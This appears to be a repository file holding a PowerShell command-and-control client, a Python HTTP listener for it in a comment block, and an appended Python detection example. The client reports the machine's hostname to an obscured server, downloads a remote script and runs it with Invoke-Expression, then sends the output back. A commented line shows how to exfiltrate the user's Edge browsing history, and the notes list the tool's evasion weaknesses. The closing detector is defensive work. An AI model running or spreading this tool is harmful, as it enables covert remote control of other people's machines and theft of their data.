Command&Control_001.ps1
99 lines (74 loc) · 3.68 KB
# Send and receive commands to a C2
# Bajiri
# For testing purposes only
# Requires PowerShell 7+ (Join-String, -SkipHttpErrorCheck and -Form are not available in Windows PowerShell 5.1)

# Obfuscate the address of the C2 server (base64 of the server URL; left empty here)
$Base64Address = ""
$HelloHeader = @{
    "Name" = $env:COMPUTERNAME
}

# Send a HEAD request to the webserver containing the hello (the hostname travels as a request header)
$Comm = Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) | %{[char]$_} | Join-String) -Headers $HelloHeader -Method Head -SkipHttpErrorCheck
if ($Comm) {
    # Fetch the command file from the server
    $Payload = Invoke-WebRequest -URI $(([System.Convert]::FromBase64String($Base64Address) | %{[char]$_} | Join-String) + "/malcommand.ps1") -Method GET -SkipHttpErrorCheck
    if ($Payload) {
        # Run the fetched text and capture whatever it prints as a single string
        $CommandExecution = Invoke-Expression -Command $($Payload.content | %{[char]$_} | Join-String) | Out-String
        $Output = @{
            "Output" = $([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($CommandExecution)))
        }
        # Send the output of the command as a header
        Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) | %{[char]$_} | Join-String) -Headers $Output -Method HEAD | Out-Null
        # Send the output as a file upload (written to disk first, in the current directory)
        [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($CommandExecution)) > Base64EncOutput
        $formtosend = @{
            "file" = Get-Item -Path Base64EncOutput
            # You can also upload things like Edge history SQLite DB
            # "history" = Get-Item -Path $("C:\Users\"+$env:USERNAME+"\AppData\Local\Microsoft\Edge\User Data\Default\History")
        }
        Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) | %{[char]$_} | Join-String) -Method Put -Form $formtosend -Headers $HelloHeader
    }
}

<#
Weaknesses:
This does not phone home or run indefinitely. It's a one-and-done sort of thing. No beaconing either.
Traffic is unencrypted and will be seen immediately. No UAC bypass/elevation included, so commands run in the user's scope.
Creating a file to upload will leave artifacts on the victim machine.
#>

<#
Python http.server code
# import dependencies
import http.server
import socketserver
import os

# Set port
PORT = 80

# Create handlers for each method
class GetHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Plain file serving, inherited from SimpleHTTPRequestHandler
        http.server.SimpleHTTPRequestHandler.do_GET(self)

    def do_HEAD(self):
        # Both the client's hello and its command output arrive as request headers, so print them all
        print(self.headers)
        http.server.SimpleHTTPRequestHandler.do_HEAD(self)

    def do_PUT(self):
        # Use the name passed in the header as the file name
        filename = self.headers['Name']
        # Write the file to the path the server is running from
        file_length = int(self.headers['Content-Length'])
        with open(filename, 'wb') as output_file:
            output_file.write(self.rfile.read(file_length))
        # Acknowledge the upload; without a response the client sees a dropped connection
        self.send_response(200)
        self.end_headers()

# Listen forever
with socketserver.TCPServer(("", PORT), GetHandler) as httpd:
    httpd.serve_forever()
'''
Files not included:
malcommand.ps1
Value: "Get-Process"

Weaknesses:
This will overwrite the output file each time. Some simple changes will allow for multiple file creation.
All files can be pulled from the server. Building in a check for a specific header and/or restricting access to files is probably a good idea.
Data does not get decoded in this script. All output is as received.

Acknowledgements:
Thanks to Jason Rebelo Neves for the do_PUT code I copy/pasted: https://stackoverflow.com/questions/66514500/how-do-i-configure-a-python-server-for-post
Also putting this in here because I'll definitely forget everything about this in 2 weeks: https://docs.python.org/3/library/http.server.html
Shout out to my Ubuntu VM for giving me Low Disk Space on "Filesystem root" notifications every time I uploaded a test file. One day I'll give you more than 16 GB.
'''
#>
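The weaknesses note says the traffic is unencrypted and "will be seen immediately", and the server's do_HEAD prints every header it receives. As an added example that is not part of this script or its server, the Python below shows what a proxy or sensor would look for: it scans request records (constructed sample data, not real captures) for the exchange pattern this client produces, a HEAD carrying a Name header, a GET for a .ps1 file, a HEAD carrying a base64 Output header, and a multipart PUT tagged with the Name header. The record field names and the hostname WS-0042 are assumptions.

```python
import base64
import re

# Constructed sample request records (method, path, headers), as a proxy or
# network sensor might log them; the hostname WS-0042 is made up.
SAMPLE_REQUESTS = [
    {"method": "HEAD", "path": "/", "headers": {"Name": "WS-0042"}},
    {"method": "GET", "path": "/malcommand.ps1", "headers": {}},
    {"method": "HEAD", "path": "/",
     "headers": {"Output": base64.b64encode(b"Handles NPM(K)\r\n  123  45 pwsh\r\n").decode()}},
    {"method": "PUT", "path": "/",
     "headers": {"Name": "WS-0042", "Content-Type": "multipart/form-data; boundary=xyz"}},
    {"method": "GET", "path": "/index.html", "headers": {"User-Agent": "curl/8.0"}},
]
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def is_b64_text(value):
    """True if value is well-formed base64 that decodes to UTF-8 text (newlines and tabs allowed)."""
    if not value or len(value) % 4 or not B64_RE.match(value):
        return False
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return False
    return all(c.isprintable() or c in "\r\n\t" for c in text)

def classify_request(req):
    """Return the indicator names one request record matches (empty list if none)."""
    method, path, headers = req["method"], req["path"], req["headers"]
    hits = []
    if method == "HEAD" and "Name" in headers:
        hits.append("head_with_name_header")            # hello: hostname sent as a header
    if method == "HEAD" and is_b64_text(headers.get("Output", "")):
        hits.append("head_with_base64_output_header")   # command output carried in a header
    if method == "GET" and path.lower().endswith(".ps1"):
        hits.append("ps1_download")                     # script fetched over plain HTTP
    if (method == "PUT" and "Name" in headers
            and headers.get("Content-Type", "").startswith("multipart/form-data")):
        hits.append("multipart_put_with_name_header")   # file upload tagged with the hostname
    return hits

def scan(requests):
    """Return (index, hits) for every request record that matched at least one indicator."""
    flagged = []
    for i, req in enumerate(requests):
        hits = classify_request(req)
        if hits:
            flagged.append((i, hits))
    return flagged
```

Each indicator on its own is weak (a HEAD with a custom header is not rare), so correlate them per client address and time window before alerting.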